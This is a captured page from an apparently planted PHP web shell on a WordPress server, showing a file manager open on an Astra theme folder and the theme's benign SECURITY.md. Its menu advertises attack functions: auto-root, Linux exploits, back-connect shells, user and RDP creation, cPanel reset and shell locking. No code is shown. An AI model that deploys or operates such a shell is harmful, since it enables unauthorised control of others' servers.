Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cilab /
wp-content /
themes /
astra /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
732
B
-rw-r--r--
SECURITY.md
1.62
KB
-rw-r--r--
archive.php
778
B
-rw-r--r--
changelog.txt
138.23
KB
-rw-r--r--
comments.php
4.64
KB
-rw-r--r--
footer.php
655
B
-rw-r--r--
functions.php
7.81
KB
-rw-r--r--
header.php
1.52
KB
-rw-r--r--
index.php
957
B
-rw-r--r--
page.php
918
B
-rw-r--r--
readme.txt
5.95
KB
-rw-r--r--
screenshot.jpg
357.85
KB
-rw-r--r--
search.php
820
B
-rw-r--r--
searchform.php
2.15
KB
-rw-r--r--
sidebar.php
1021
B
-rw-r--r--
single.php
740
B
-rw-r--r--
style.css
4.46
KB
-rw-r--r--
theme.json
2.45
KB
-rw-r--r--
toolset-config.json
7.81
KB
-rw-r--r--
wpml-config.xml
5.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SECURITY.md
# Security Policy Thank you for your interest in helping us improve the security of our open source products, websites and other properties. We have created this Bug Bounty program to appreciate and reward your efforts. ## Reporting a Vulnerability Please report (suspected) security vulnerabilities to **[support+security@bsf.io](mailto:support+security@bsf.io)**. You will receive a response from us within 48 hours. If the issue is confirmed, we will release a patch as soon as possible depending on complexity but historically within a few days. We have [a bug bounty program](https://brainstormforce.com/bug-bounty-program/) too which gives people guidelines on how a report should be reported and how we can reward them for proper reporting. If our team cannot reproduce and verify an issue, a bounty cannot be awarded. To help streamline our intake process, we ask that submissions include: - Description of the vulnerability - Steps to reproduce the reported vulnerability - Proof of exploitability (e.g. screenshot, video) - Perceived impact to another user or the organization - Proposed CVSSv3 Vector & Score (without environmental and temporal modifiers) - List of URLs and affected parameters - Other vulnerable URLs, additional payloads, Proof-of-Concept code - Browser, OS and/or app version used during testing - Impact of the bug Security reports should be sent to **[support+security@bsf.io](mailto:support+security@bsf.io)** For more details, please [visit this page](https://brainstormforce.com/bug-bounty-program/). Once again, thank you for helping us improve security. We really appreciate it.
Close